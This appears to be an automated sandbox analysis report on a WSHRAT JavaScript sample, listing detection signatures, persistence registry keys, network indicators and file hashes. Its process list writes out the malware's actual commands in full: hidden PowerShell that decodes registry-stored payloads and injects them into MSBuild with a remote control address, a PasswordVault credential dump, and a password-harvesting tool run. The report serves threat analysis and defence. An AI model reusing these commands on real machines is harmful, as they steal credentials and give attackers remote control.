Analysis Overview
SHA256
1d96c9a57ad378deea20d2e275d5cc70692e2fb673d311ff3e101e695cf979eb
Threat Level: Known bad
The file Sdk283724711.js was found to be: Known bad.
Malicious Activity Summary
WSHRAT
Nirsoft
NirSoft MailPassView
Blocklisted process makes network request
Drops startup file
Checks computer location settings
Adds Run key to start application
Looks up external IP address via web service
Suspicious use of SetThreadContext
Enumerates physical storage devices
Script User-Agent
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Suspicious use of SetWindowsHookEx
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-09-05 23:43
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-09-05 23:43
Reported
2023-09-05 23:45
Platform
win7-20230831-en
Max time kernel
55s
Max time network
154s
Command Line
Signatures
WSHRAT
NirSoft MailPassView
Nirsoft
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\wscript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sdk283724711.js | C:\Windows\system32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sdk283724711.js | C:\Windows\System32\wscript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sdk283724711 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Sdk283724711.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sdk283724711 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Sdk283724711.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sdk283724711 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Sdk283724711.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sdk283724711 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Sdk283724711.js\"" | C:\Windows\system32\wscript.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1108 set thread context of 2908 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Sdk283724711.js
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\Sdk283724711.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'2.59.254.111 2420 \"WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands\" 1'));"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
path 2.59.254.111 2420 "WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands" 1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Roaming\wshsdk" && C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll > "C:\Users\Admin\AppData\Roaming\wshout"
C:\Users\Admin\AppData\Roaming\wshsdk\python.exe
C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Users\Admin\AppData\Roaming\cmdc.exe
"C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Roaming\wshlogs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| US | 8.8.8.8:53 | wshsoft.company | udp |
| SG | 194.59.164.67:80 | wshsoft.company | tcp |
Files
C:\Users\Admin\AppData\Roaming\Sdk283724711.js
| MD5 | a577b3a40efbcfb8b749ac033f1a7a71 |
| SHA1 | 2dd22a217b5faec549b6a948a6d1f75c5114c485 |
| SHA256 | 1d96c9a57ad378deea20d2e275d5cc70692e2fb673d311ff3e101e695cf979eb |
| SHA512 | 62eb4a174a8da9cbb5958b0b71d76136a6d52de8a8b54fe2437d714337fdce6f803fba6318f3dee80cc0d8d31119adf7af934833dce9b93b992156b70f4fbde5 |
| SHA512 | da024ccb50d4a2a5355b7712ba896df850cee57aa4ada33aad0bae6960bcd1e5e3cee9488371ab6e19a2073508fbb3f0b257382713a31bc0947a4bf1f7a20be4 |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-synch-l1-2-0.dll
| MD5 | 0d1aa99ed8069ba73cfd74b0fddc7b3a |
| SHA1 | ba1f5384072df8af5743f81fd02c98773b5ed147 |
| SHA256 | 30d99ce1d732f6c9cf82671e1d9088aa94e720382066b79175e2d16778a3dad1 |
| SHA512 | 6b1a87b1c223b757e5a39486be60f7dd2956bb505a235df406bcf693c7dd440e1f6d65ffef7fde491371c682f4a8bb3fd4ce8d8e09a6992bb131addf11ef2bf9 |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-synch-l1-2-0.dll
| MD5 | 0d1aa99ed8069ba73cfd74b0fddc7b3a |
| SHA1 | ba1f5384072df8af5743f81fd02c98773b5ed147 |
| SHA256 | 30d99ce1d732f6c9cf82671e1d9088aa94e720382066b79175e2d16778a3dad1 |
| SHA512 | 6b1a87b1c223b757e5a39486be60f7dd2956bb505a235df406bcf693c7dd440e1f6d65ffef7fde491371c682f4a8bb3fd4ce8d8e09a6992bb131addf11ef2bf9 |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-file-l2-1-0.dll
| MD5 | e479444bdd4ae4577fd32314a68f5d28 |
| SHA1 | 77edf9509a252e886d4da388bf9c9294d95498eb |
| SHA256 | c85dc081b1964b77d289aac43cc64746e7b141d036f248a731601eb98f827719 |
| SHA512 | 2afab302fe0f7476a4254714575d77b584cd2dc5330b9b25b852cd71267cda365d280f9aa8d544d4687dc388a2614a51c0418864c41ad389e1e847d81c3ab744 |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-file-l2-1-0.dll
| MD5 | e479444bdd4ae4577fd32314a68f5d28 |
| SHA1 | 77edf9509a252e886d4da388bf9c9294d95498eb |
| SHA256 | c85dc081b1964b77d289aac43cc64746e7b141d036f248a731601eb98f827719 |
| SHA512 | 2afab302fe0f7476a4254714575d77b584cd2dc5330b9b25b852cd71267cda365d280f9aa8d544d4687dc388a2614a51c0418864c41ad389e1e847d81c3ab744 |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | babf80608fd68a09656871ec8597296c |
| SHA1 | 33952578924b0376ca4ae6a10b8d4ed749d10688 |
| SHA256 | 24c9aa0b70e557a49dac159c825a013a71a190df5e7a837bfa047a06bba59eca |
| SHA512 | 3ffffd90800de708d62978ca7b50fe9ce1e47839cda11ed9e7723acec7ab5829fa901595868e4ab029cdfb12137cf8ecd7b685953330d0900f741c894b88257b |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | babf80608fd68a09656871ec8597296c |
| SHA1 | 33952578924b0376ca4ae6a10b8d4ed749d10688 |
| SHA256 | 24c9aa0b70e557a49dac159c825a013a71a190df5e7a837bfa047a06bba59eca |
| SHA512 | 3ffffd90800de708d62978ca7b50fe9ce1e47839cda11ed9e7723acec7ab5829fa901595868e4ab029cdfb12137cf8ecd7b685953330d0900f741c894b88257b |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-file-l1-2-0.dll
| MD5 | e2f648ae40d234a3892e1455b4dbbe05 |
| SHA1 | d9d750e828b629cfb7b402a3442947545d8d781b |
| SHA256 | c8c499b012d0d63b7afc8b4ca42d6d996b2fcf2e8b5f94cacfbec9e6f33e8a03 |
| SHA512 | 18d4e7a804813d9376427e12daa444167129277e5ff30502a0fa29a96884bf902b43a5f0e6841ea1582981971843a4f7f928f8aecac693904ab20ca40ee4e954 |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-file-l1-2-0.dll
| MD5 | e2f648ae40d234a3892e1455b4dbbe05 |
| SHA1 | d9d750e828b629cfb7b402a3442947545d8d781b |
| SHA256 | c8c499b012d0d63b7afc8b4ca42d6d996b2fcf2e8b5f94cacfbec9e6f33e8a03 |
| SHA512 | 18d4e7a804813d9376427e12daa444167129277e5ff30502a0fa29a96884bf902b43a5f0e6841ea1582981971843a4f7f928f8aecac693904ab20ca40ee4e954 |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | d0289835d97d103bad0dd7b9637538a1 |
| SHA1 | 8ceebe1e9abb0044808122557de8aab28ad14575 |
| SHA256 | 91eeb842973495deb98cef0377240d2f9c3d370ac4cf513fd215857e9f265a6a |
| SHA512 | 97c47b2e1bfd45b905f51a282683434ed784bfb334b908bf5a47285f90201a23817ff91e21ea0b9ca5f6ee6b69acac252eec55d895f942a94edd88c4bfd2dafd |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | d0289835d97d103bad0dd7b9637538a1 |
| SHA1 | 8ceebe1e9abb0044808122557de8aab28ad14575 |
| SHA256 | 91eeb842973495deb98cef0377240d2f9c3d370ac4cf513fd215857e9f265a6a |
| SHA512 | 97c47b2e1bfd45b905f51a282683434ed784bfb334b908bf5a47285f90201a23817ff91e21ea0b9ca5f6ee6b69acac252eec55d895f942a94edd88c4bfd2dafd |
\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-localization-l1-2-0.dll
| MD5 | eff11130bfe0d9c90c0026bf2fb219ae |
| SHA1 | cf4c89a6e46090d3d8feeb9eb697aea8a26e4088 |
| SHA256 | 03ad57c24ff2cf895b5f533f0ecbd10266fd8634c6b9053cc9cb33b814ad5d97 |
| SHA512 | 8133fb9f6b92f498413db3140a80d6624a705f80d9c7ae627dfd48adeb8c5305a61351bf27bbf02b4d3961f9943e26c55c2a66976251bb61ef1537bc8c212add |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-core-localization-l1-2-0.dll
| MD5 | eff11130bfe0d9c90c0026bf2fb219ae |
| SHA1 | cf4c89a6e46090d3d8feeb9eb697aea8a26e4088 |
| SHA256 | 03ad57c24ff2cf895b5f533f0ecbd10266fd8634c6b9053cc9cb33b814ad5d97 |
| SHA512 | 8133fb9f6b92f498413db3140a80d6624a705f80d9c7ae627dfd48adeb8c5305a61351bf27bbf02b4d3961f9943e26c55c2a66976251bb61ef1537bc8c212add |
\Users\Admin\AppData\Roaming\wshsdk\ucrtbase.dll
| MD5 | d6326267ae77655f312d2287903db4d3 |
| SHA1 | 1268bef8e2ca6ebc5fb974fdfaff13be5ba7574f |
| SHA256 | 0bb8c77de80acf9c43de59a8fd75e611cc3eb8200c69f11e94389e8af2ceb7a9 |
| SHA512 | 11db71d286e9df01cb05acef0e639c307efa3fef8442e5a762407101640ac95f20bad58f0a21a4df7dbcda268f934b996d9906434bf7e575c4382281028f64d4 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\__init__.cpython-37.pyc
| MD5 | e3f691d123a890f18538f5fead7bd6cd |
| SHA1 | f6e77a0008cefa3a7e3f67c7d11c7787391db5d9 |
| SHA256 | 3473f433a4d2c09e637f6da9b21172d31468a453c2b47fff27f776e820f25934 |
| SHA512 | 776e40399adb6e7211ed67022c2b1b12309e5436760c7a0104fe243610e87559f9890575b972cc569d8d793c2d94c70e2f051f36d803ca7c8c89f77f0b39cc23 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\codecs.cpython-37.pyc
| MD5 | 31a2fe679cad1b609caba7c961f43d70 |
| SHA1 | 21d411d11ce126c054ea70f90196c81b18eaa550 |
| SHA256 | 6b903c49e04070578aa47a378ff830bc9407be92c8b952a134cec40e944fa30d |
| SHA512 | 34dde13a6a197caf1ed9fe73ca30e70c966027c44509e398334a6e9be8eb8f5c3289ef66383f3d9cc69da26cca2097c48cb5fde7be14476fe35fd2cc087da855 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\utf_8.cpython-37.pyc
| MD5 | 96f8cc58ae6da7199951c19543193a61 |
| SHA1 | c9c75c757cb1ea2198f84d80de052db7d874b7c7 |
| SHA256 | e24b41e43dae2dcda0a88cae0dc52993ce66790d5addd498d772ea5406f6068e |
| SHA512 | fcb0d4c5f7ceac706b764caf495afb3517e807f89e3f21534997400c1b8fcfc7b23e09bfd3a4599ab4bdf388a36f3f9cd7c14f22ae9c48e03b1d85ed7a8c58dc |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\utf_8.py
| MD5 | f932d95afcaea5fdc12e72d25565f948 |
| SHA1 | 2685d94ba1536b7870b7172c06fe72cf749b4d29 |
| SHA256 | 9c54c7db8ce0722ca4ddb5f45d4e170357e37991afb3fcdc091721bf6c09257e |
| SHA512 | a10035ae10b963d2183d31c72ff681a21ed9e255dda22624cbaf8dbed5afbde7be05bb719b07573de9275d8b4793d2f4aef0c0c8346203eea606bb818a02cab6 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\aliases.cpython-37.pyc
| MD5 | 840a56d291513211bd0e65864b9169f3 |
| SHA1 | af58891c07f864d4753baa1dfdbdd71a614cded1 |
| SHA256 | a597b04b97a8bfe577010d816ca8a1480247ea96b025c59c345b7b120bb5f922 |
| SHA512 | b1fbfbc5ca147fd0fcb9e7a509d5ec5a4578bb038a8116c908aa48ecd593694ab4d318b2bc6c8240bc6c2b4e2e23b7b6ed9d295619a862748ad3609445cd3d87 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\aliases.py
| MD5 | 794677da57c541836ef8c0be93415219 |
| SHA1 | 67956cb212acc2b5dc578cff48d1fe189e5274e4 |
| SHA256 | 9ed4517a5778b2efbd76704f841738c12441ff649eed83b2ea033b3843c9b3d5 |
| SHA512 | 33c3fa687ea494029ff6f250557eaaa24647f847255628b9198a8a33859db0a716d5a3c54743d58b796a46102f2a57da3445935ca0fef1245164523ff4294088 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\abc.cpython-37.pyc
| MD5 | cea4fa818d4468f70d14cae1c3fa9593 |
| SHA1 | cb060d183cb2f4850d2199a51e82301f653d51c4 |
| SHA256 | f64180d0a00e09801d9fa616f7fc21ffc7bb532b19209320059eb3d126e0485f |
| SHA512 | 9f434ebacc2d75483b00c4ee687ccd8df69dde06bbf1cb7bb32e7d6ca5db82130f78543a8166446a49fcd51ade6e2f983eb2469dcde0e1f6d4da595fbd01d3a2 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\abc.py
| MD5 | 17e3407344267dde764ecaa542cccd4d |
| SHA1 | ec774abd2a9aa2729a8af6a9cd67dfb22fd0acae |
| SHA256 | f3bbcdb6406b9f9a3467ecd5a8ba74f1accb36adc95aa50d805c2927f09a2304 |
| SHA512 | 850b5f7293ac61d41eb5e13791aac643858daac0950ed1271ac1f3534184f8f379c248e94e63a9abbb699ae4436e4324a96daf5465abc6a50cbe99887024e1f6 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\__pycache__\io.cpython-37.pyc
| MD5 | deddc1aebef1d56aa912f32deff5355f |
| SHA1 | 472c6923a8fae0cfb7fba6890f2c37dfaf685bcc |
| SHA256 | c27434a09d7e90d3e7980427fa6d22d0eb570663e110b68dd9a71f8bcc3aad24 |
| SHA512 | 89edddf61d0ce04650e5886f5dc98931a3ac52ecacac6e8fe78ff2b3c5db5943118b600ca05fec3d4022a6469dfeeea0979b03313fbabfc057ac5772103bd328 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\io.py
| MD5 | 2c098fb1d1a4c0a183da506daa34a786 |
| SHA1 | 55fb1833342ad13c35c6d3cb5fda819327773b21 |
| SHA256 | f89251a16945f7c125554cc91c7e7ed1560b366396c3153a4cadfb7a7133cd03 |
| SHA512 | 375903e7bf79cf6c8e7c4decff482f4b59594aaaef62e01f1f45d0f9e26f9e864690d79cdfbdcf46cd83562cc465ef419cac32739d35bcb9fe6124682a997918 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__pycache__\latin_1.cpython-37.pyc
| MD5 | 2312f7d16eed297caa4a0da46f612479 |
| SHA1 | afc6f0ff4b5d57204b20c4127a58e8cdb0f1f09d |
| SHA256 | 3b033fb54ed66cfd73e6cd1479e3a7d7166d70d713d232707dd2b28ac92af2c7 |
| SHA512 | 66faa5cc8ede6e929ac22ba48a6f1136a70879ccbdbe31146c1f4fb9f9d3744976e36fc47c533a3be4a6edb5b72870dc12018ac73924acf6217c17002c35815a |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\latin_1.py
| MD5 | 92c4d5e13fe5abece119aa4d0c4be6c5 |
| SHA1 | 79e464e63e3f1728efe318688fe2052811801e23 |
| SHA256 | 6d5a6c46fe6675543ea3d04d9b27ccce8e04d6dfeb376691381b62d806a5d016 |
| SHA512 | c95f5344128993e9e6c2bf590ce7f2cffa9f3c384400a44c0bc3aca71d666ed182c040ec495ea3af83abbd9053c705334e5f4c3f7c07f65e7031e95fdfb7a561 |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\codecs.py
| MD5 | d1d8d96ee5398cda53cbddca69b8e2ab |
| SHA1 | 3998c0a2124ab260a7d83f296228be90418b8366 |
| SHA256 | 39f79489cb6ef0f95dc0ae007c5ece25897f76fa9b56449922f764896cec5ed3 |
| SHA512 | 0d324416498fba44b41d175194527d5035176642e535bb446ac2c64feed175df7c316507bda375baa77907465973d1340999c859b5d20b51cc2bd96a30857b7b |
C:\Users\Admin\AppData\Roaming\wshsdk\lib\encodings\__init__.py
| MD5 | 82afd9dcb28c19afdc42097fcbdbe662 |
| SHA1 | 329e052afe981c8ba32ff78df2deb9d041c05f8b |
| SHA256 | 921635dcb46ba5192db20e6c7ed0429c647f7d55ead2f6feaadc00b8410a646e |
| SHA512 | 4ae0a9de57f0df6119b99be7168e35917da63e24487b67a4afe96d3996cc42ad22716ac411791998642498bd5f64ab14d9571f4ebf2ee5abc6eb2761270cc897 |
C:\Users\Admin\AppData\Roaming\CMDCEX~1.ZIP
C:\Users\Admin\AppData\Roaming\cmdc.exe
Analysis: behavioral2
Detonation Overview
Submitted
2023-09-05 23:43
Reported
2023-09-05 23:45
Platform
win10v2004-20230831-en
Max time kernel
81s
Max time network
152s
Command Line
Signatures
WSHRAT
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\wscript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\wscript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sdk283724711.js | C:\Windows\system32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sdk283724711.js | C:\Windows\System32\wscript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sdk283724711 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Sdk283724711.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sdk283724711 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Sdk283724711.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sdk283724711 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Sdk283724711.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sdk283724711 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Sdk283724711.js\"" | C:\Windows\system32\wscript.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3316 set thread context of 4964 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Sdk283724711.js
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\Sdk283724711.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'2.59.254.111 2420 \"WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands\" 1'));"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
path 2.59.254.111 2420 "WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands" 1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
path 2.59.254.111 2420 "WSHRAT|AA342AE5|NVYNMMTR|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands" 1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
